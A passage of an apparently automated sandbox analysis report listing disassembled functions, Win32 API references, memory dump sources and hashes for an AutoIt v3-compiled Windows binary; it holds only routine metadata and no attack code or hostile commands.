                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2364484715-0
                                                                                                                                                          • Opcode ID: 7c05057d5efe0a87e98dcd6a266b0dd4c4361e3af134e303c30e7c4b578bd1e9
                                                                                                                                                          • Instruction ID: 895e2401c650c99e3e77c393cb6ac1f3b268ca397d9bb804c7405c407a9fd4ca
                                                                                                                                                          • Opcode Fuzzy Hash: 7c05057d5efe0a87e98dcd6a266b0dd4c4361e3af134e303c30e7c4b578bd1e9
                                                                                                                                                          • Instruction Fuzzy Hash: D8E0B631110209EFCB11EF58EC49E9A37B6FB19350F058055FA055B6B1D731AA61EF51
                                                                                                                                                          Function 0018F37C Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL ref: 0018F3A1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DialogNtdllProc_
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3239928679-0
                                                                                                                                                          • Opcode ID: d68fb0445723d5803220f5ec226e079689b868ef47dfe62084c17169bf961de9
                                                                                                                                                          • Instruction ID: 7427dcbe7d3b0ce1633cc0f29fd95d5de7dd0e8daf967413515d542b87539193
                                                                                                                                                          • Opcode Fuzzy Hash: d68fb0445723d5803220f5ec226e079689b868ef47dfe62084c17169bf961de9
                                                                                                                                                          • Instruction Fuzzy Hash: 13E0173420424CEFCB01DF88EC84E8A3BA5FB1A350F040054FD058B761C771A870DB61
                                                                                                                                                          Function 0018F3AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL ref: 0018F3D0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DialogNtdllProc_
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3239928679-0
                                                                                                                                                          • Opcode ID: e4207a6494bf41c7c89fd4a4805ac56f4a1e9b6335937573943d26fc9f71233e
                                                                                                                                                          • Instruction ID: 61d8b86395b1609fad7a7bcd074d30f1e11687efef83c7e45efe6cb4366cac7d
                                                                                                                                                          • Opcode Fuzzy Hash: e4207a6494bf41c7c89fd4a4805ac56f4a1e9b6335937573943d26fc9f71233e
                                                                                                                                                          • Instruction Fuzzy Hash: 7BE0173420024CEFCB01DF88E884E8A3BA5FB1A350F040054FD058B762C772A870EBA1
                                                                                                                                                          Function 0013B845 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                            • Part of subcall function 0013B86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0013B85B), ref: 0013B926
                                                                                                                                                            • Part of subcall function 0013B86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,0013B85B,00000000,?,?,0013AF1E,?,?), ref: 0013B9BD
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,0013AF1E,?,?), ref: 0013B864
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2797419724-0
                                                                                                                                                          • Opcode ID: 5b298abdffe580edd4c6e4e67792fd6f79057ca494aa0801dfd667cdf98a2885
                                                                                                                                                          • Instruction ID: f92db910c8e25d636210131dcdbe1df5552a1bc468edfd804d6576ffdfa79275
                                                                                                                                                          • Opcode Fuzzy Hash: 5b298abdffe580edd4c6e4e67792fd6f79057ca494aa0801dfd667cdf98a2885
                                                                                                                                                          • Instruction Fuzzy Hash: 65D0127124430C77DB102B61EC07F4D3E5DAF11790F408420F705695E19B7264509555
                                                                                                                                                          Function 00148E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00148E1F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                          • Opcode ID: 1e980d1e0057729ad1848207434c84d0c3c54d254eef44000a467f9495baaab4
                                                                                                                                                          • Instruction ID: 685d18fef1f97dc3933395e16b9c787fbb20a64b45d1cea616c4e4551806bdaf
                                                                                                                                                          • Opcode Fuzzy Hash: 1e980d1e0057729ad1848207434c84d0c3c54d254eef44000a467f9495baaab4
                                                                                                                                                          • Instruction Fuzzy Hash: 63A0127000090CA78E001B51FC044447F5CEB051507004010F40D00821873354504581
                                                                                                                                                          Function 0014A937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetProcessHeap.KERNEL32(00146AE9,001D67D8,00000014), ref: 0014A937
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                          • Opcode ID: 7db110693366c8a7f313185fae8246dfcec16aca120ef7ad96a88f62cb5733c7
                                                                                                                                                          • Instruction ID: fa9fdd3c5ad2d42a4fa4f6d70ab1a28081476e4d56d1eda0f1250d0c77f73a1f
                                                                                                                                                          • Opcode Fuzzy Hash: 7db110693366c8a7f313185fae8246dfcec16aca120ef7ad96a88f62cb5733c7
                                                                                                                                                          • Instruction Fuzzy Hash: 90B012B03035024BD7084F38BC9411E3AD4974E101301503DB007C6D61DB3084D0DF00
                                                                                                                                                          Function 00140EC4 Relevance: .3, Instructions: 345COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                          • Instruction ID: 333258881e43d0e9b86f9cdc3474d84dc8c712312aab96430ebe7ec33336fcb9
                                                                                                                                                          • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                          • Instruction Fuzzy Hash: 4BC184732051934ADF2E463BC43493EBAA15BA27B132A076DE4B3CB5E4EF34D664D610
                                                                                                                                                          Function 001412F9 Relevance: .3, Instructions: 341COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                          • Instruction ID: d68d1a22d68ed4939d3cee986b8e1353dffc7f9bdcb91be502ed876920d2c6ee
                                                                                                                                                          • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                          • Instruction Fuzzy Hash: A2C181732051934ADF2E463BC47493EBAA15BA27B131A076DD8B3CF5E4EF24C664D620
                                                                                                                                                          Function 00140A8F Relevance: .3, Instructions: 331COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                                          • Instruction ID: 0fe7ae0ff06b519cc4d3d4bc18e5d9e913d5dd0a1c8a1fb0a9f676784f384f64
                                                                                                                                                          • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                                          • Instruction Fuzzy Hash: 27C1B37320519349DF2F863B847483EBAA19BA67B531A076DD5B3CB4E0EF34C664D610
                                                                                                                                                          Function 00140677 Relevance: .3, Instructions: 323COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                          • Instruction ID: 8534730750fb92e9a9822f74e02eb6642deaadc03eae9391bde517441e83344d
                                                                                                                                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                          • Instruction Fuzzy Hash: 30C1AF7320919349DB2E463BC43483EBBA15BA67B132A076DD5B3CB4E1EF34D624D620
                                                                                                                                                          Function 0017A750 Relevance: 75.7, APIs: 39, Strings: 4, Instructions: 490commemoryfileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0017A7A5
                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0017A7B7
                                                                                                                                                          • DestroyWindow.USER32 ref: 0017A7C5
                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0017A7DF
                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 0017A7E6
                                                                                                                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0017A927
                                                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0017A937
                                                                                                                                                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A97F
                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0017A98B
                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0017A9C5
                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A9FA
                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017AA05
                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0017AA0E
                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017AA1D
                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0017AA26
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017AA2D
                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0017AA38
                                                                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 0017AA4A
                                                                                                                                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,001AD9BC,00000000), ref: 0017AA60
                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0017AA70
                                                                                                                                                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0017AA96
                                                                                                                                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0017AAB5
                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017AAD7
                                                                                                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017ACC4
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Global$Rect$Create$DeleteFileFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                          • API String ID: 2148010464-2373415609
                                                                                                                                                          • Opcode ID: d2d5378dbbc4923669da33493031c4b969c011b92a9bc53fb0a93416aab8d642
                                                                                                                                                          • Instruction ID: 40a692f109b8729bc216b29fd15a7f5164778aaad04261979b4cb386054140b8
                                                                                                                                                          • Opcode Fuzzy Hash: d2d5378dbbc4923669da33493031c4b969c011b92a9bc53fb0a93416aab8d642
                                                                                                                                                          • Instruction Fuzzy Hash: 89029271900215EFDB14DFA4DC89EAE7BB9FF49310F008159F90AAB6A1D730AD81CB61
                                                                                                                                                          Function 0018D095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 0018D0EB
                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0018D11C
                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0018D128
                                                                                                                                                          • SetBkColor.GDI32(?,000000FF), ref: 0018D142
